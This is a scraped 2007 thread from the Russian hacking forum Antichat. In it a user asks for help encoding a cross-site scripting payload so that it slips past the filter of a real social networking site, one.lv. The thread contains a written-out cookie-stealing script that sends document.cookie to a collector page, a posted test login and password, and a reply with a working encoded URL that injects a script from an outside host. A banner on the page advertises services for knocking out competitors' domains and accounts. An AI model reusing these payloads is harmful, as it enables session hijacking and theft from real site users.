xss шифровка

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Чаты
xss шифровка

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

xss шифровка

09.12.2007, 14:56

offiks

Новичок

Регистрация: 16.01.2007

Сообщений: 16

С нами: 10166802

Репутация: 6

xss шифровка

помогите вставить скрипт
--><script>document.write(String.fromCharCode(<scrip t>document.write("<img src=http://127.0.0.1/skript.php?kuki_one="+escape(document.cookie)+">") ;</script>));</script><!--
и обойти фильтр

Я ломал голову, да нету у меня особых навыков навыков, но хотелось бы сделать, помогите пожалуйста перекодировать чтоб сайт принял мою наживу

𝕏 Twitter Reddit Telegram Копировать ссылку

09.12.2007, 15:04

~~bul.666~~

Banned

Регистрация: 06.06.2006

Сообщений: 944

С нами: 10489346

Репутация: 1403

Цитата:

и обойти фильтр

А фильтр на что ругаеться?

09.12.2007, 15:07

Sn@k3

Познавший АНТИЧАТ

Регистрация: 13.04.2006

Сообщений: 1,738

С нами: 10566621

Репутация: 1198

в программе inetcrack http://old.antichat.ru/inetcrack/можно перевести

09.12.2007, 15:09

Dumkopff

Познающий

Регистрация: 05.04.2006

Сообщений: 76

С нами: 10578485

Репутация: 73

http://old.antichat.ru/crackchat/HTML/
кури.

09.12.2007, 15:11

offiks

Новичок

Регистрация: 16.01.2007

Сообщений: 16

С нами: 10166802

Репутация: 6

я честно не могу разобратся в чём дело но ко мне доходит только: " escape(document.cookie) "

по моему он не обробатывает плюсы, но когда я заменил плюсы на %2B он всё равно это же и присылает.

P.S. большое спасибо за отзывчевость

09.12.2007, 15:22

Sn@k3

Познавший АНТИЧАТ

Регистрация: 13.04.2006

Сообщений: 1,738

С нами: 10566621

Репутация: 1198

Цитата:

Сообщение от Dumkopff

http://old.antichat.ru/crackchat/HTML/
кури.

если ты не в курсе инет кряк как раз и делает это, есть такая строка как стринг =\ хех

09.12.2007, 15:33

offiks

Новичок

Регистрация: 16.01.2007

Сообщений: 16

С нами: 10166802

Репутация: 6

я всё равно могу и декодировать и тут http://ha.ckers.org/xss.html#XSScalc , там всё же есть? не так ли? =[

эту уязвимость я пытаюсь осуществить на сайте one.lv (в поле слева - найти друга (http://c7.one.lv/navigate.do?st.id=community.ownfriends.page&st.fri ends.fl.search=тут)

помогите подходяще закодировать

пробовал кодировать весь урл, всё равно не работает...

Пожалуйста

для меня это вопрос сложный, уже 2 день парюсь

09.12.2007, 15:42

~~bul.666~~

Banned

Регистрация: 06.06.2006

Сообщений: 944

С нами: 10489346

Репутация: 1403

пля. там нужна регистрация... При реге надо воодить телефон =\ Я так понял туда пасс отправляеться =\

09.12.2007, 15:45

offiks

Новичок

Регистрация: 16.01.2007

Сообщений: 16

С нами: 10166802

Репутация: 6

ой забыл, я хотел написать и подготовленый акаунт, извеняюсь
Login: offx
password: antichat

кстате, когда я ему впариваю %22%2B%22 он их декодирует не в: "+" (как должно быть) а в: " "

Последний раз редактировалось offiks; 09.12.2007 в 15:47..

#10

09.12.2007, 15:58

~~bul.666~~

Banned

Регистрация: 06.06.2006

Сообщений: 944

С нами: 10489346

Репутация: 1403

http://c7.one.lv/navigate.do?st.id=community.ownfriends.page&st.fri ends.fl.search=%22%3E;%3Cscript%20src=http://lamer-power.jino-net.ru/hek%3E%20%3C/script%3E

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Активная XSS на mail.ru	Dronga	Уязвимости Mail-сервис	69	05.04.2008 01:56
Новая XSS на форуме phpBB 2.0.19	NeMiNeM	Уязвимости CMS / форумов	6	26.10.2006 21:30
Cross Site Scripting FAQ	k00p3r	Уязвимости	6	12.06.2005 16:23

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Внести депозит

Депозит создан

Вывести депозит

Создать сделку

Мои сделки

Сделка

ESCROW ADMIN PANEL